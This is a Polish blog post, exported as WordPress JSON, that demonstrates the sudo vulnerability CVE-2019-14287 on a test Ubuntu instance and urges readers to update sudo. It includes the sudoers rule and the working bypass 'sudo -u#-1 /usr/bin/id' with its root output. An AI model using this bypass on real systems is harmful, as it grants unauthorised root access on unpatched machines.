{"id":287,"date":"2019-10-20T11:50:01","date_gmt":"2019-10-20T11:50:01","guid":{"rendered":"http:\/\/www.linuxsystems.ovh\/?p=287"},"modified":"2024-04-03T09:17:44","modified_gmt":"2024-04-03T09:17:44","slug":"cve-2019-14287-podatnosc-sudo","status":"publish","type":"post","link":"https:\/\/www.linuxsystems.ovh\/?p=287","title":{"rendered":"CVE 2019-14287 podatno\u015b\u0107 sudo"},"content":{"rendered":"\n<p>Dzisiaj chc\u0119 wam opisa\u0107 podatno\u015b\u0107 sudo.<\/p>\n\n\n\n<!--more-->\n\n\n\n<p>Do tego celu uruchomi\u0142em na AWS testow\u0105 instancj\u0119 z Ubuntu Server 14.04 LTS (HVM) . Mamy tam starsz\u0105 wersj\u0119 sudo:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ sudo --version\nSudo version 1.8.9p5\nSudoers policy plugin version 1.8.9p5\nSudoers file grammar version 43\nSudoers I\/O plugin version 1.8.9p5<\/code><\/pre>\n\n\n\n<p>Czyli podatn\u0105 \ud83d\ude42<\/p>\n\n\n\n<p>teraz tworzymy usera (ja go nazwa\u0142em <strong>test<\/strong> )<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ sudo adduser test\nAdding user `test' ...\nAdding new group `test' (1001) ...\nAdding new user `test' (1001) with group `test' ...\nCreating home directory `\/home\/test' ...\nCopying files from `\/etc\/skel' ...\nEnter new UNIX password: \nRetype new UNIX password: \npasswd: password updated successfully\nChanging the user information for test\nEnter the new value, or press ENTER for the default\n\tFull Name &#91;]: \n\tRoom Number &#91;]: \n\tWork Phone &#91;]: \n\tHome Phone &#91;]: \n\tOther &#91;]: \nIs the information correct? &#91;Y\/n] <\/code><\/pre>\n\n\n\n<p>i w pliku \/etc\/sudoers doda\u0142em linijk\u0119:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>test    ALL=(ALL, !root) \/usr\/bin\/id<\/code><\/pre>\n\n\n\n<p>Pod linijk\u0105:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>root\tALL=(ALL:ALL) ALL<\/code><\/pre>\n\n\n\n<p>przechodz\u0119 na usera test poleceniem <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>su - test<\/code><\/pre>\n\n\n\n<p>I pr\u00f3buj\u0119 wykona\u0107 polecenie sudo id:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ sudo \/usr\/bin\/id \n&#91;sudo] password for test: \nSorry, user test is not allowed to execute '\/usr\/bin\/id' as root on ip-172-31-41-236.eu-central-1.compute.internal.<\/code><\/pre>\n\n\n\n<p>Oczywi\u015bcie nie zezwala mi na to, wi\u0119c pr\u00f3buj\u0119:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ sudo -u#-1 \/usr\/bin\/id \n&#91;sudo] password for test: \nuid=0(root) gid=0(root) groups=0(root)<\/code><\/pre>\n\n\n\n<p>i nagle uda\u0142o si\u0119 \ud83d\ude42 -&gt; uda\u0142o si\u0119 uruchomi\u0107 polecenie id, pomimo tego, \u017ce tak naprawd\u0119 nie mamy do tego uprawnie\u0144&#8230; Czyli na serwerze, na kt\u00f3rym mamy sudo jest podatno\u015b\u0107, \u017ce kto\u015b mo\u017ce edytowa\u0107 nie sw\u00f3j plik uruchamiaj\u0105c np. polecenie vim \ud83d\ude42 . Zosta\u0142o to ju\u017c naprawione w nowszych wersjach sudo, dlatego zach\u0119cam was do aktualizacji swoich serwer\u00f3w<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dzisiaj chc\u0119 wam opisa\u0107 podatno\u015b\u0107 sudo.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-287","post","type-post","status-publish","format-standard","hentry","category-bezpieczenstwo-internetowe"],"_links":{"self":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/287","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=287"}],"version-history":[{"count":5,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/287\/revisions"}],"predecessor-version":[{"id":507,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/287\/revisions\/507"}],"wp:attachment":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=287"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=287"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=287"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}